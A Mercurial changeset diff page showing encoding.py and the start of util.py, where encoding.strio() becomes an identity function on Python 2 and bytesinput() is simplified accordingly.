##// END OF EJS Templates
py3: make encoding.strio() an identity function on Python 2...
Yuya Nishihara -
r33852:f18b1153 default
parent child Browse files
Show More
@@ -1,589 +1,591 b''
1 # encoding.py - character transcoding support for Mercurial
1 # encoding.py - character transcoding support for Mercurial
2 #
2 #
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import array
10 import array
11 import io
11 import io
12 import locale
12 import locale
13 import os
13 import os
14 import unicodedata
14 import unicodedata
15
15
16 from . import (
16 from . import (
17 error,
17 error,
18 policy,
18 policy,
19 pycompat,
19 pycompat,
20 )
20 )
21
21
# charencode is resolved through the policy layer; which implementation
# backs it (C extension vs. pure python) is decided there — not visible here
charencode = policy.importmod(r'charencode')

# fast ASCII-only case folding; callers below (lower()/upper()) catch
# UnicodeDecodeError from these when the input contains non-ASCII bytes
asciilower = charencode.asciilower
asciiupper = charencode.asciiupper

# shorthand: convert an internal byte string to a native str
_sysstr = pycompat.sysstr
28
28
if pycompat.ispy3:
    # Python 3 dropped unichr(); chr() already yields unicode characters
    unichr = chr

# These unicode characters are ignored by HFS+ (Apple Technote 1150,
# "Unicode Subtleties"), so we need to ignore them in some places for
# sanity.
_ignore = [unichr(int(x, 16)).encode("utf-8") for x in
           "200c 200d 200e 200f 202a 202b 202c 202d 202e "
           "206a 206b 206c 206d 206e 206f feff".split()]
# verify the next function will work
assert all(i.startswith(("\xe2", "\xef")) for i in _ignore)
40
40
def hfsignoreclean(s):
    """Strip from s the codepoints that HFS+ silently ignores.

    >>> hfsignoreclean(u'.h\u200cg'.encode('utf-8'))
    '.hg'
    >>> hfsignoreclean(u'.h\ufeffg'.encode('utf-8'))
    '.hg'
    """
    # every ignorable UTF-8 sequence starts with one of these two lead
    # bytes, so a cheap containment check lets clean strings pass untouched
    if "\xe2" not in s and "\xef" not in s:
        return s
    for seq in _ignore:
        s = s.replace(seq, '')
    return s
53
53
# encoding.environ is provided read-only, which may not be used to modify
# the process environment
_nativeenviron = (not pycompat.ispy3 or os.supports_bytes_environ)
if not pycompat.ispy3:
    # Python 2: os.environ is already byte strings
    environ = os.environ # re-exports
elif _nativeenviron:
    # Python 3 with bytes-environ support: use the byte-string view
    environ = os.environb # re-exports
else:
    # preferred encoding isn't known yet; use utf-8 to avoid unicode error
    # and recreate it once encoding is settled
    environ = dict((k.encode(u'utf-8'), v.encode(u'utf-8'))
                   for k, v in os.environ.items()) # re-exports
66
66
# map problematic locale-reported names to codec names Python understands
_encodingfixers = {
    '646': lambda: 'ascii',
    'ANSI_X3.4-1968': lambda: 'ascii',
}

try:
    # HGENCODING in the environment overrides the locale-derived encoding
    encoding = environ.get("HGENCODING")
    if not encoding:
        encoding = locale.getpreferredencoding().encode('ascii') or 'ascii'
        encoding = _encodingfixers.get(encoding, lambda: encoding)()
except locale.Error:
    encoding = 'ascii'
# decode error policy for fromlocal(): 'strict', 'replace' or 'ignore'
encodingmode = environ.get("HGENCODINGMODE", "strict")
# encoding tried by tolocal() when strict UTF-8 decoding fails
fallbackencoding = 'ISO-8859-1'
81
81
class localstr(bytes):
    '''A byte string in the local encoding that remembers the exact UTF-8
    text it was derived from, so converting back to UTF-8 is lossless.'''
    def __new__(cls, u, l):
        inst = bytes.__new__(cls, l)
        inst._utf8 = u
        return inst
    def __hash__(self):
        # hash the cached UTF-8 form: two different source strings that
        # degrade to identical local bytes must not collide in dicts
        return hash(self._utf8)
91
91
def tolocal(s):
    """
    Convert a string from internal UTF-8 to local encoding

    All internal strings should be UTF-8 but some repos before the
    implementation of locale support may contain latin1 or possibly
    other character sets. We attempt to decode everything strictly
    using UTF-8, then Latin-1, and failing that, we use UTF-8 and
    replace unknown characters.

    The localstr class is used to cache the known UTF-8 encoding of
    strings next to their local representation to allow lossless
    round-trip conversion back to UTF-8.

    >>> u = 'foo: \\xc3\\xa4' # utf-8
    >>> l = tolocal(u)
    >>> l
    'foo: ?'
    >>> fromlocal(l)
    'foo: \\xc3\\xa4'
    >>> u2 = 'foo: \\xc3\\xa1'
    >>> d = { l: 1, tolocal(u2): 2 }
    >>> len(d) # no collision
    2
    >>> 'foo: ?' in d
    False
    >>> l1 = 'foo: \\xe4' # historical latin1 fallback
    >>> l = tolocal(l1)
    >>> l
    'foo: ?'
    >>> fromlocal(l) # magically in utf-8
    'foo: \\xc3\\xa4'
    """

    try:
        try:
            # make sure string is actually stored in UTF-8
            u = s.decode('UTF-8')
            if encoding == 'UTF-8':
                # fast path
                return s
            r = u.encode(_sysstr(encoding), u"replace")
            if u == r.decode(_sysstr(encoding)):
                # r is a safe, non-lossy encoding of s
                return r
            # lossy conversion: keep the original UTF-8 alongside it
            return localstr(s, r)
        except UnicodeDecodeError:
            # we should only get here if we're looking at an ancient changeset
            try:
                u = s.decode(_sysstr(fallbackencoding))
                r = u.encode(_sysstr(encoding), u"replace")
                if u == r.decode(_sysstr(encoding)):
                    # r is a safe, non-lossy encoding of s
                    return r
                return localstr(u.encode('UTF-8'), r)
            except UnicodeDecodeError:
                u = s.decode("utf-8", "replace") # last ditch
                # can't round-trip
                return u.encode(_sysstr(encoding), u"replace")
    except LookupError as k:
        # the configured encoding name is unknown to the codecs machinery
        raise error.Abort(k, hint="please check your locale settings")
153
153
def fromlocal(s):
    """Convert a string from the local character encoding to UTF-8.

    Decoding honours the mode configured through HGENCODINGMODE, which
    defaults to 'strict' (unknown characters abort with an error).
    'replace' substitutes a placeholder character instead, and 'ignore'
    silently drops the offending bytes.
    """
    # a localstr still carries the exact UTF-8 it was created from,
    # so the round trip is lossless
    if isinstance(s, localstr):
        return s._utf8

    try:
        decoded = s.decode(_sysstr(encoding), _sysstr(encodingmode))
    except UnicodeDecodeError as inst:
        # show a small window of context around the undecodable byte
        context = s[max(0, inst.start - 10):inst.start + 10]
        raise error.Abort("decoding near '%s': %s!" % (context, inst))
    except LookupError as k:
        raise error.Abort(k, hint="please check your locale settings")
    return decoded.encode("utf-8")
177
177
def unitolocal(u):
    """Convert a unicode string to a byte string of local encoding"""
    utf8bytes = u.encode('utf-8')
    return tolocal(utf8bytes)
181
181
def unifromlocal(s):
    """Convert a byte string of local encoding to a unicode string"""
    utf8bytes = fromlocal(s)
    return utf8bytes.decode('utf-8')
185
185
def unimethod(bytesfunc):
    """Wrap a __bytes__() implementation so it can serve as __str__()
    (and __unicode__()) on Python 3 by converting its result to unicode."""
    def unifunc(obj):
        rawbytes = bytesfunc(obj)
        return unifromlocal(rawbytes)
    return unifunc
192
192
# converter functions between native str and byte string. use these if the
# character encoding is not aware (e.g. exception message) or is known to
# be locale dependent (e.g. date formatting.)
if pycompat.ispy3:
    # native str is unicode: route through the unicode converters above
    strtolocal = unitolocal
    strfromlocal = unifromlocal
    strmethod = unimethod
else:
    # native str is already a byte string: nothing to convert
    strtolocal = pycompat.identity
    strfromlocal = pycompat.identity
    strmethod = pycompat.identity
204
204
if not _nativeenviron:
    # now encoding and helper functions are available, recreate the environ
    # dict to be exported to other modules
    environ = dict((tolocal(k.encode(u'utf-8')), tolocal(v.encode(u'utf-8')))
                   for k, v in os.environ.items()) # re-exports

# How to treat ambiguous-width characters. Set to 'wide' to treat as wide.
# The string holds the east_asian_width category letters counted as two
# columns by ucolwidth(): Wide, Fullwidth and optionally Ambiguous.
_wide = _sysstr(environ.get("HGENCODINGAMBIGUOUS", "narrow") == "wide"
                and "WFA" or "WF")
214
214
def colwidth(s):
    """Return the number of display columns a local-encoding byte string
    occupies."""
    decoded = s.decode(_sysstr(encoding), u'replace')
    return ucolwidth(decoded)
218
218
def ucolwidth(d):
    """Find the display column width of a Unicode string."""
    eastwidth = getattr(unicodedata, 'east_asian_width', None)
    if eastwidth is None:
        # no width data available; assume one column per character
        return len(d)
    # characters whose east-asian-width category is in _wide take 2 columns
    return sum(2 if eastwidth(ch) in _wide else 1 for ch in d)
225
225
def getcols(s, start, c):
    '''Use colwidth to find a c-column substring of s starting at byte
    index start'''
    # a c-column substring needs at least c bytes, so begin probing there
    for end in xrange(start + c, len(s)):
        candidate = s[start:end]
        if colwidth(candidate) == c:
            return candidate
233
233
def trim(s, width, ellipsis='', leftside=False):
    """Trim string 's' to at most 'width' columns (including 'ellipsis').

    If 'leftside' is True, left side of string 's' is trimmed.
    'ellipsis' is always placed at trimmed side.

    >>> ellipsis = '+++'
    >>> from . import encoding
    >>> encoding.encoding = 'utf-8'
    >>> t= '1234567890'
    >>> print trim(t, 12, ellipsis=ellipsis)
    1234567890
    >>> print trim(t, 10, ellipsis=ellipsis)
    1234567890
    >>> print trim(t, 8, ellipsis=ellipsis)
    12345+++
    >>> print trim(t, 8, ellipsis=ellipsis, leftside=True)
    +++67890
    >>> print trim(t, 8)
    12345678
    >>> print trim(t, 8, leftside=True)
    34567890
    >>> print trim(t, 3, ellipsis=ellipsis)
    +++
    >>> print trim(t, 1, ellipsis=ellipsis)
    +
    >>> u = u'\u3042\u3044\u3046\u3048\u304a' # 2 x 5 = 10 columns
    >>> t = u.encode(encoding.encoding)
    >>> print trim(t, 12, ellipsis=ellipsis)
    \xe3\x81\x82\xe3\x81\x84\xe3\x81\x86\xe3\x81\x88\xe3\x81\x8a
    >>> print trim(t, 10, ellipsis=ellipsis)
    \xe3\x81\x82\xe3\x81\x84\xe3\x81\x86\xe3\x81\x88\xe3\x81\x8a
    >>> print trim(t, 8, ellipsis=ellipsis)
    \xe3\x81\x82\xe3\x81\x84+++
    >>> print trim(t, 8, ellipsis=ellipsis, leftside=True)
    +++\xe3\x81\x88\xe3\x81\x8a
    >>> print trim(t, 5)
    \xe3\x81\x82\xe3\x81\x84
    >>> print trim(t, 5, leftside=True)
    \xe3\x81\x88\xe3\x81\x8a
    >>> print trim(t, 4, ellipsis=ellipsis)
    +++
    >>> print trim(t, 4, ellipsis=ellipsis, leftside=True)
    +++
    >>> t = '\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa' # invalid byte sequence
    >>> print trim(t, 12, ellipsis=ellipsis)
    \x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa
    >>> print trim(t, 10, ellipsis=ellipsis)
    \x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa
    >>> print trim(t, 8, ellipsis=ellipsis)
    \x11\x22\x33\x44\x55+++
    >>> print trim(t, 8, ellipsis=ellipsis, leftside=True)
    +++\x66\x77\x88\x99\xaa
    >>> print trim(t, 8)
    \x11\x22\x33\x44\x55\x66\x77\x88
    >>> print trim(t, 8, leftside=True)
    \x33\x44\x55\x66\x77\x88\x99\xaa
    >>> print trim(t, 3, ellipsis=ellipsis)
    +++
    >>> print trim(t, 1, ellipsis=ellipsis)
    +
    """
    try:
        u = s.decode(_sysstr(encoding))
    except UnicodeDecodeError:
        # undecodable input: fall back to byte-level trimming, where each
        # byte counts as one column
        if len(s) <= width: # trimming is not needed
            return s
        width -= len(ellipsis)
        if width <= 0: # no enough room even for ellipsis
            return ellipsis[:width + len(ellipsis)]
        if leftside:
            return ellipsis + s[-width:]
        return s[:width] + ellipsis

    if ucolwidth(u) <= width: # trimming is not needed
        return s

    width -= len(ellipsis)
    if width <= 0: # no enough room even for ellipsis
        return ellipsis[:width + len(ellipsis)]

    # drop characters one at a time from the trimmed side until the
    # remainder fits; multi-column characters make a fixed slice wrong
    if leftside:
        uslice = lambda i: u[i:]
        concat = lambda s: ellipsis + s
    else:
        uslice = lambda i: u[:-i]
        concat = lambda s: s + ellipsis
    for i in xrange(1, len(u)):
        usub = uslice(i)
        if ucolwidth(usub) <= width:
            return concat(usub.encode(_sysstr(encoding)))
    return ellipsis # no enough room for multi-column characters
326
326
def lower(s):
    """Best-effort, encoding-aware lowercasing of the local string s."""
    try:
        # pure-ASCII strings take the fast path
        return asciilower(s)
    except UnicodeDecodeError:
        pass
    try:
        if isinstance(s, localstr):
            text = s._utf8.decode("utf-8")
        else:
            text = s.decode(_sysstr(encoding), _sysstr(encodingmode))

        folded = text.lower()
        if folded == text:
            return s # preserve localstring
        return folded.encode(_sysstr(encoding))
    except UnicodeError:
        return s.lower() # we don't know how to fold this except in ASCII
    except LookupError as k:
        raise error.Abort(k, hint="please check your locale settings")
347
347
def upper(s):
    "best-effort encoding-aware case-folding of local string s"
    # asciiupper raises UnicodeDecodeError on non-ASCII input, in which
    # case we fall back to the slower unicode-aware path
    try:
        return asciiupper(s)
    except UnicodeDecodeError:
        return upperfallback(s)
354
354
def upperfallback(s):
    """Uppercase s via the local encoding; the slow path used when the
    ASCII-only fast path in upper() fails."""
    try:
        if isinstance(s, localstr):
            text = s._utf8.decode("utf-8")
        else:
            text = s.decode(_sysstr(encoding), _sysstr(encodingmode))

        folded = text.upper()
        if folded == text:
            return s # preserve localstring
        return folded.encode(_sysstr(encoding))
    except UnicodeError:
        return s.upper() # we don't know how to fold this except in ASCII
    except LookupError as k:
        raise error.Abort(k, hint="please check your locale settings")
370
370
class normcasespecs(object):
    '''Constants describing what a platform's normcase does to ASCII.

    Each platform declares one of these values, which must agree with
    what its normcase implementation actually does:

    lower: normcase lowercases ASCII strings
    upper: normcase uppercases ASCII strings
    other: the fallback function should always be called

    This should be kept in sync with normcase_spec in util.h.'''
    other = 0
    lower = -1
    upper = 1
385
385
# _jsonmap[b] is the JSON string representation of byte value b:
# control characters become \uXXXX (or the short escapes below),
# printable ASCII passes through unchanged
_jsonmap = []
_jsonmap.extend("\\u%04x" % x for x in range(32))
_jsonmap.extend(pycompat.bytechr(x) for x in range(32, 127))
_jsonmap.append('\\u007f')
_jsonmap[0x09] = '\\t'
_jsonmap[0x0a] = '\\n'
_jsonmap[0x22] = '\\"'
_jsonmap[0x5c] = '\\\\'
_jsonmap[0x08] = '\\b'
_jsonmap[0x0c] = '\\f'
_jsonmap[0x0d] = '\\r'
# the paranoid table is copied BEFORE the high bytes are appended below,
# so any byte >= 0x80 raises IndexError there (forcing \uXXXX escaping
# in jsonescape), and it additionally escapes '<' and '>' for web output
_paranoidjsonmap = _jsonmap[:]
_paranoidjsonmap[0x3c] = '\\u003c' # '<' (e.g. escape "</script>")
_paranoidjsonmap[0x3e] = '\\u003e' # '>'
_jsonmap.extend(pycompat.bytechr(x) for x in range(128, 256))
401
401
def jsonescape(s, paranoid=False):
    '''returns a string suitable for JSON

    JSON is problematic for us because it doesn't support non-Unicode
    bytes. To deal with this, we take the following approach:

    - localstr objects are converted back to UTF-8
    - valid UTF-8/ASCII strings are passed as-is
    - other strings are converted to UTF-8b surrogate encoding
    - apply JSON-specified string escaping

    (escapes are doubled in these tests)

    >>> jsonescape('this is a test')
    'this is a test'
    >>> jsonescape('escape characters: \\0 \\x0b \\x7f')
    'escape characters: \\\\u0000 \\\\u000b \\\\u007f'
    >>> jsonescape('escape characters: \\t \\n \\r \\" \\\\')
    'escape characters: \\\\t \\\\n \\\\r \\\\" \\\\\\\\'
    >>> jsonescape('a weird byte: \\xdd')
    'a weird byte: \\xed\\xb3\\x9d'
    >>> jsonescape('utf-8: caf\\xc3\\xa9')
    'utf-8: caf\\xc3\\xa9'
    >>> jsonescape('')
    ''

    If paranoid, non-ascii and common troublesome characters are also escaped.
    This is suitable for web output.

    >>> jsonescape('escape boundary: \\x7e \\x7f \\xc2\\x80', paranoid=True)
    'escape boundary: ~ \\\\u007f \\\\u0080'
    >>> jsonescape('a weird byte: \\xdd', paranoid=True)
    'a weird byte: \\\\udcdd'
    >>> jsonescape('utf-8: caf\\xc3\\xa9', paranoid=True)
    'utf-8: caf\\\\u00e9'
    >>> jsonescape('non-BMP: \\xf0\\x9d\\x84\\x9e', paranoid=True)
    'non-BMP: \\\\ud834\\\\udd1e'
    >>> jsonescape('<foo@example.org>', paranoid=True)
    '\\\\u003cfoo@example.org\\\\u003e'
    '''

    if paranoid:
        jm = _paranoidjsonmap
    else:
        jm = _jsonmap

    u8chars = toutf8b(s)
    try:
        return ''.join(jm[x] for x in bytearray(u8chars)) # fast path
    except IndexError:
        # the paranoid table only covers ASCII; bytes >= 0x80 land here
        # and get full \uXXXX escaping below
        pass
    # non-BMP char is represented as UTF-16 surrogate pair
    u16codes = array.array('H', u8chars.decode('utf-8').encode('utf-16'))
    u16codes.pop(0) # drop BOM
    return ''.join(jm[x] if x < 128 else '\\u%04x' % x for x in u16codes)
457
457
# number of bytes to attempt decoding for a utf-8 sequence, indexed by the
# high nibble of the lead byte; 0 means a plain ascii byte
_utf8len = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 3, 4]
459
459
def getutf8char(s, pos):
    '''get the next full utf-8 character in the given string, starting at pos

    Raises a UnicodeError if the given location does not start a valid
    utf-8 character.
    '''
    # the lead byte's high nibble determines the sequence length
    nbytes = _utf8len[ord(s[pos]) >> 4]
    if not nbytes:
        # plain ascii byte: it is its own character
        return s[pos]

    char = s[pos:pos + nbytes]
    # round-trip through the codec to validate the sequence
    char.decode("utf-8")
    return char
476
476
def toutf8b(s):
    '''convert a local, possibly-binary string into UTF-8b

    This is intended as a generic method to preserve data when working
    with schemes like JSON and XML that have no provision for
    arbitrary byte strings. As Mercurial often doesn't know
    what encoding data is in, we use so-called UTF-8b.

    If a string is already valid UTF-8 (or ASCII), it passes unmodified.
    Otherwise, unsupported bytes are mapped to UTF-16 surrogate range,
    uDC00-uDCFF.

    Principles of operation:

    - ASCII and UTF-8 data successfully round-trips and is understood
      by Unicode-oriented clients
    - filenames and file contents in arbitrary other encodings can have
      be round-tripped or recovered by clueful clients
    - local strings that have a cached known UTF-8 encoding (aka
      localstr) get sent as UTF-8 so Unicode-oriented clients get the
      Unicode data they want
    - because we must preserve UTF-8 bytestring in places such as
      filenames, metadata can't be roundtripped without help

    (Note: "UTF-8b" often refers to decoding a mix of valid UTF-8 and
    arbitrary bytes into an internal Unicode format that can be
    re-encoded back into the original. Here we are exposing the
    internal surrogate encoding as a UTF-8 string.)
    '''

    # fast path: 0xed is the lead byte of every UTF-8-encoded surrogate
    # (see the "\xed\xb0\x80" comparisons below), so a string without it
    # needs no re-escaping and can be returned as-is when it decodes
    if "\xed" not in s:
        if isinstance(s, localstr):
            # localstr carries a cached, known-good UTF-8 rendition
            return s._utf8
        try:
            s.decode('utf-8')
            return s
        except UnicodeDecodeError:
            pass

    # slow path: walk character by character, mapping undecodable bytes
    # into the U+DC00-U+DCFF surrogate range
    r = ""
    pos = 0
    l = len(s)
    while pos < l:
        try:
            c = getutf8char(s, pos)
            if "\xed\xb0\x80" <= c <= "\xed\xb3\xbf":
                # have to re-escape existing U+DCxx characters
                c = unichr(0xdc00 + ord(s[pos])).encode('utf-8')
                pos += 1
            else:
                pos += len(c)
        except UnicodeDecodeError:
            # invalid sequence: escape the single byte as U+DC00 + value
            c = unichr(0xdc00 + ord(s[pos])).encode('utf-8')
            pos += 1
        r += c
    return r
533
533
def fromutf8b(s):
    '''Given a UTF-8b string, return a local, possibly-binary string.

    return the original binary string. This
    is a round-trip process for strings like filenames, but metadata
    that's was passed through tolocal will remain in UTF-8.

    >>> roundtrip = lambda x: fromutf8b(toutf8b(x)) == x
    >>> m = "\\xc3\\xa9\\x99abcd"
    >>> toutf8b(m)
    '\\xc3\\xa9\\xed\\xb2\\x99abcd'
    >>> roundtrip(m)
    True
    >>> roundtrip("\\xc2\\xc2\\x80")
    True
    >>> roundtrip("\\xef\\xbf\\xbd")
    True
    >>> roundtrip("\\xef\\xef\\xbf\\xbd")
    True
    >>> roundtrip("\\xf1\\x80\\x80\\x80\\x80")
    True
    '''

    # fast path - look for uDxxx prefixes in s
    # (0xed is the lead byte of every UTF-8-encoded surrogate)
    if "\xed" not in s:
        return s

    # We could do this with the unicode type but some Python builds
    # use UTF-16 internally (issue5031) which causes non-BMP code
    # points to be escaped. Instead, we use our handy getutf8char
    # helper again to walk the string without "decoding" it.

    r = ""
    pos = 0
    l = len(s)
    while pos < l:
        c = getutf8char(s, pos)
        pos += len(c)
        # unescape U+DCxx characters
        if "\xed\xb0\x80" <= c <= "\xed\xb3\xbf":
            # the original byte value lives in the low 8 bits of the
            # escaped code point
            c = chr(ord(c.decode("utf-8")) & 0xff)
        r += c
    return r
577
577
if pycompat.ispy3:
    class strio(io.TextIOWrapper):
        """Wrapper around TextIOWrapper that respects hg's encoding assumptions.

        Also works around Python closing streams.
        """

        def __init__(self, buffer):
            # always use hg's detected encoding rather than the locale
            # default TextIOWrapper would pick
            super(strio, self).__init__(buffer, encoding=_sysstr(encoding))

        def __del__(self):
            """Override __del__ so it doesn't close the underlying stream."""
else:
    # on Python 2 the native str type already carries bytes, so streams
    # need no wrapping: strio is simply the identity function
    strio = pycompat.identity
@@ -1,3777 +1,3776 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import
16 from __future__ import absolute_import
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import os
29 import os
30 import platform as pyplatform
30 import platform as pyplatform
31 import re as remod
31 import re as remod
32 import shutil
32 import shutil
33 import signal
33 import signal
34 import socket
34 import socket
35 import stat
35 import stat
36 import string
36 import string
37 import subprocess
37 import subprocess
38 import sys
38 import sys
39 import tempfile
39 import tempfile
40 import textwrap
40 import textwrap
41 import time
41 import time
42 import traceback
42 import traceback
43 import warnings
43 import warnings
44 import zlib
44 import zlib
45
45
46 from . import (
46 from . import (
47 encoding,
47 encoding,
48 error,
48 error,
49 i18n,
49 i18n,
50 policy,
50 policy,
51 pycompat,
51 pycompat,
52 )
52 )
53
53
54 base85 = policy.importmod(r'base85')
54 base85 = policy.importmod(r'base85')
55 osutil = policy.importmod(r'osutil')
55 osutil = policy.importmod(r'osutil')
56 parsers = policy.importmod(r'parsers')
56 parsers = policy.importmod(r'parsers')
57
57
58 b85decode = base85.b85decode
58 b85decode = base85.b85decode
59 b85encode = base85.b85encode
59 b85encode = base85.b85encode
60
60
61 cookielib = pycompat.cookielib
61 cookielib = pycompat.cookielib
62 empty = pycompat.empty
62 empty = pycompat.empty
63 httplib = pycompat.httplib
63 httplib = pycompat.httplib
64 httpserver = pycompat.httpserver
64 httpserver = pycompat.httpserver
65 pickle = pycompat.pickle
65 pickle = pycompat.pickle
66 queue = pycompat.queue
66 queue = pycompat.queue
67 socketserver = pycompat.socketserver
67 socketserver = pycompat.socketserver
68 stderr = pycompat.stderr
68 stderr = pycompat.stderr
69 stdin = pycompat.stdin
69 stdin = pycompat.stdin
70 stdout = pycompat.stdout
70 stdout = pycompat.stdout
71 stringio = pycompat.stringio
71 stringio = pycompat.stringio
72 urlerr = pycompat.urlerr
72 urlerr = pycompat.urlerr
73 urlreq = pycompat.urlreq
73 urlreq = pycompat.urlreq
74 xmlrpclib = pycompat.xmlrpclib
74 xmlrpclib = pycompat.xmlrpclib
75
75
76 # workaround for win32mbcs
76 # workaround for win32mbcs
77 _filenamebytestr = pycompat.bytestr
77 _filenamebytestr = pycompat.bytestr
78
78
def isatty(fp):
    """Return whether *fp* reports being attached to a terminal.

    Objects lacking an ``isatty`` method are treated as non-ttys.
    """
    try:
        result = fp.isatty()
    except AttributeError:
        return False
    return result
84
84
# glibc determines buffering on first write to stdout - if we replace a TTY
# destined stdout with a pipe destined stdout (e.g. pager), we want line
# buffering
if isatty(stdout):
    # reopen stdout in binary mode with line buffering (bufsize=1)
    stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)

if pycompat.osname == 'nt':
    from . import windows as platform
    # winstdout wraps stdout; see windows.winstdout for its behavior
    stdout = platform.winstdout(stdout)
else:
    from . import posix as platform
96
96
97 _ = i18n._
97 _ = i18n._
98
98
99 bindunixsocket = platform.bindunixsocket
99 bindunixsocket = platform.bindunixsocket
100 cachestat = platform.cachestat
100 cachestat = platform.cachestat
101 checkexec = platform.checkexec
101 checkexec = platform.checkexec
102 checklink = platform.checklink
102 checklink = platform.checklink
103 copymode = platform.copymode
103 copymode = platform.copymode
104 executablepath = platform.executablepath
104 executablepath = platform.executablepath
105 expandglobs = platform.expandglobs
105 expandglobs = platform.expandglobs
106 explainexit = platform.explainexit
106 explainexit = platform.explainexit
107 findexe = platform.findexe
107 findexe = platform.findexe
108 gethgcmd = platform.gethgcmd
108 gethgcmd = platform.gethgcmd
109 getuser = platform.getuser
109 getuser = platform.getuser
110 getpid = os.getpid
110 getpid = os.getpid
111 groupmembers = platform.groupmembers
111 groupmembers = platform.groupmembers
112 groupname = platform.groupname
112 groupname = platform.groupname
113 hidewindow = platform.hidewindow
113 hidewindow = platform.hidewindow
114 isexec = platform.isexec
114 isexec = platform.isexec
115 isowner = platform.isowner
115 isowner = platform.isowner
116 listdir = osutil.listdir
116 listdir = osutil.listdir
117 localpath = platform.localpath
117 localpath = platform.localpath
118 lookupreg = platform.lookupreg
118 lookupreg = platform.lookupreg
119 makedir = platform.makedir
119 makedir = platform.makedir
120 nlinks = platform.nlinks
120 nlinks = platform.nlinks
121 normpath = platform.normpath
121 normpath = platform.normpath
122 normcase = platform.normcase
122 normcase = platform.normcase
123 normcasespec = platform.normcasespec
123 normcasespec = platform.normcasespec
124 normcasefallback = platform.normcasefallback
124 normcasefallback = platform.normcasefallback
125 openhardlinks = platform.openhardlinks
125 openhardlinks = platform.openhardlinks
126 oslink = platform.oslink
126 oslink = platform.oslink
127 parsepatchoutput = platform.parsepatchoutput
127 parsepatchoutput = platform.parsepatchoutput
128 pconvert = platform.pconvert
128 pconvert = platform.pconvert
129 poll = platform.poll
129 poll = platform.poll
130 popen = platform.popen
130 popen = platform.popen
131 posixfile = platform.posixfile
131 posixfile = platform.posixfile
132 quotecommand = platform.quotecommand
132 quotecommand = platform.quotecommand
133 readpipe = platform.readpipe
133 readpipe = platform.readpipe
134 rename = platform.rename
134 rename = platform.rename
135 removedirs = platform.removedirs
135 removedirs = platform.removedirs
136 samedevice = platform.samedevice
136 samedevice = platform.samedevice
137 samefile = platform.samefile
137 samefile = platform.samefile
138 samestat = platform.samestat
138 samestat = platform.samestat
139 setbinary = platform.setbinary
139 setbinary = platform.setbinary
140 setflags = platform.setflags
140 setflags = platform.setflags
141 setsignalhandler = platform.setsignalhandler
141 setsignalhandler = platform.setsignalhandler
142 shellquote = platform.shellquote
142 shellquote = platform.shellquote
143 spawndetached = platform.spawndetached
143 spawndetached = platform.spawndetached
144 split = platform.split
144 split = platform.split
145 sshargs = platform.sshargs
145 sshargs = platform.sshargs
146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 statisexec = platform.statisexec
147 statisexec = platform.statisexec
148 statislink = platform.statislink
148 statislink = platform.statislink
149 testpid = platform.testpid
149 testpid = platform.testpid
150 umask = platform.umask
150 umask = platform.umask
151 unlink = platform.unlink
151 unlink = platform.unlink
152 username = platform.username
152 username = platform.username
153
153
154 try:
154 try:
155 recvfds = osutil.recvfds
155 recvfds = osutil.recvfds
156 except AttributeError:
156 except AttributeError:
157 pass
157 pass
158 try:
158 try:
159 setprocname = osutil.setprocname
159 setprocname = osutil.setprocname
160 except AttributeError:
160 except AttributeError:
161 pass
161 pass
162
162
163 # Python compatibility
163 # Python compatibility
164
164
165 _notset = object()
165 _notset = object()
166
166
167 # disable Python's problematic floating point timestamps (issue4836)
167 # disable Python's problematic floating point timestamps (issue4836)
168 # (Python hypocritically says you shouldn't change this behavior in
168 # (Python hypocritically says you shouldn't change this behavior in
169 # libraries, and sure enough Mercurial is not a library.)
169 # libraries, and sure enough Mercurial is not a library.)
170 os.stat_float_times(False)
170 os.stat_float_times(False)
171
171
def safehasattr(thing, attr):
    """Return True if *thing* has an attribute named *attr*.

    Implemented via getattr with a unique sentinel default, so only the
    presence of the attribute is tested.
    """
    found = getattr(thing, attr, _notset)
    return found is not _notset
174
174
def bytesinput(fin, fout, *args, **kwargs):
    """Prompt on *fout*, read one line from *fin*, and return it as bytes.

    input()/raw_input() only talk to the real sys.stdin/sys.stdout, so
    those are temporarily rebound (wrapped by encoding.strio, which is
    the identity function on Python 2) and restored afterwards.
    """
    sin, sout = sys.stdin, sys.stdout
    try:
        sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
        if pycompat.ispy3:
            # input() yields a str; strtolocal converts it back to the
            # byte strings hg works with
            return encoding.strtolocal(input(*args, **kwargs))
        else:
            # raw_input() already returns bytes on Python 2
            return raw_input(*args, **kwargs)
    finally:
        sys.stdin, sys.stdout = sin, sout
186
185
def bitsfrom(container):
